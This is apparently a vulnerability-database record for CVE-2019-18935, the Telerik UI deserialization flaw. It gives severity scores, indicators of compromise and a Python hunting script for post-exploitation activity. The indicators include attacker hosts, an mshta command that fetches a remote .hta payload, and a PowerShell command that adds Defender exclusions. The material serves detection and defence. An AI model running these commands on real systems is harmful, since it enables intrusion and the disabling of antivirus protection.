cbcvebase.
CVE-2019-18935
published 2019-12-11

Priority: P1 · 98 · critical
CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability, due 2022-05-03
Exploited in the wild
EPSS: 99.74% (100.0th percentile)
Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)

Affected (1 range)

Vendor: telerik
Product: ui_for_asp.net_ajax
Version range: 2011.1.315 – 2020.1.114
Fixed in: not listed

Detection & IOCs (extracted from sources)

url: http://48[.]218.138.60/a.txt
url: http://48[.]218.138[.]60/m.txt
url: mshta http://172[.]86.96.245/129-80.hta
ip: 172[.]86.96.245
ip: 48[.]218.138.60
command: "C:\Windows\system32\reg.exe" query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
command: powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath D:\
filename: 129-80.hta
  • MSHTA spawning network connections to retrieve .hta payloads is a strong indicator of post-exploitation activity following Telerik deserialization RCE; alert on mshta.exe making outbound HTTP connections.
  • RingQ loader uses .NET mixed-mode assemblies with embedded native C++ code to evade .NET analysis tools; standard dnSpy/ILSpy analysis will show empty managed code — use native debugger to inspect unmanaged entry points.
  • Tunneling/reverse proxy tools (Fuso, FRP) deployed post-exploitation to expose NAT-protected servers; detect unusual outbound persistent TCP connections from IIS servers to external IPs on non-standard ports.
  • ASPX .NET web shells deployed on Telerik servers after CVE-2019-18935 exploitation; monitor for new .aspx file creation in web root directories by w3wp.exe.
  • CVE-2019-18935 accounted for 8% of all exploitation attempts recorded by Fortinet IPS sensors in H2 2024, indicating active, widespread scanning and exploitation in the wild.
  • The deserialization exploit is only possible when encryption keys are known (e.g., via CVE-2017-11317 or CVE-2017-11357); patching or rotating keys breaks the exploit chain.
  • As of version 2020.1.114, a default setting prevents exploitation; in 2019.3.1023 a non-default setting can prevent exploitation, but earlier versions have no such protection.
  • The vulnerability is particularly dangerous because many ASP.NET applications may run older versions of Telerik UI, leaving victims exposed even if the applications themselves are patched.
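Detection logic for the post-exploitation behaviours listed above (mshta fetching remote .hta files, IIS worker tunnelling to external hosts, .aspx drops by w3wp.exe, and the Defender exclusion command from the IOC list), as an added example that is not part of this record. The Sysmon-like event shape, the web root path and the sample addresses are constructed assumptions.

```python
import ipaddress
import re

WEB_ROOT = r"c:\inetpub\wwwroot"            # assumed IIS web root (lower-case for comparison)
WEB_EXTS = (".aspx", ".ashx", ".asmx")      # server-side file types a web shell would use
NORMAL_PORTS = {80, 443}                    # expected outbound ports for an IIS worker
# Address ranges treated as internal; everything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# Constructed sample events in a Sysmon-like shape:
# id 1 = process create, 3 = network connect, 11 = file create.
# Addresses come from RFC 5737 documentation ranges, not real infrastructure.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://198.51.100.7/x.hta"},
    {"id": 3, "image": r"C:\Windows\System32\mshta.exe",
     "dst_ip": "198.51.100.7", "dst_port": 80},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath D:\\"},
    {"id": 11, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "target": r"C:\inetpub\wwwroot\uploads\cmd.aspx"},
    {"id": 3, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "dst_ip": "203.0.113.9", "dst_port": 7000},
    {"id": 3, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "dst_ip": "10.0.0.5", "dst_port": 1433},          # internal DB traffic, benign
    {"id": 11, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "target": r"C:\inetpub\wwwroot\static\app.css"},   # static asset, benign
]

def _exe(ev):
    """Base name of the process image, lower-cased."""
    return ev["image"].rsplit("\\", 1)[-1].lower()

def _external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def hunt(events):
    """Return (rule, detail) pairs for events matching the heuristics above."""
    hits = []
    for ev in events:
        exe, eid = _exe(ev), ev["id"]
        cmd = ev.get("cmdline", "").lower()
        if eid == 1 and exe == "mshta.exe" and re.search(r"https?://\S+\.hta\b", cmd):
            hits.append(("mshta_remote_hta", ev["cmdline"]))
        elif eid == 1 and "add-mppreference" in cmd and "-exclusionpath" in cmd:
            hits.append(("defender_exclusion_added", ev["cmdline"]))
        elif eid == 3 and exe == "mshta.exe" and _external(ev["dst_ip"]):
            hits.append(("mshta_outbound", f"{ev['dst_ip']}:{ev['dst_port']}"))
        elif (eid == 3 and exe == "w3wp.exe" and _external(ev["dst_ip"])
              and ev["dst_port"] not in NORMAL_PORTS):
            hits.append(("iis_tunnel_candidate", f"{ev['dst_ip']}:{ev['dst_port']}"))
        elif (eid == 11 and exe == "w3wp.exe" and ev["target"].lower().startswith(WEB_ROOT)
              and ev["target"].lower().endswith(WEB_EXTS)):
            hits.append(("webshell_drop", ev["target"]))
    return hits

if __name__ == "__main__":
    for rule, detail in hunt(EVENTS):
        print(f"{rule:26} {detail}")
```

The two benign events (internal SQL connection, static .css write) produce no hits, which is the point of the external-address and extension checks.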

CVSS provenance

Source         Version  Score  Severity  Vector
nvd            v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd            v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck               9.8    CRITICAL
cisa                    9.8    CRITICAL
vendor_oracle           8.8    CRITICAL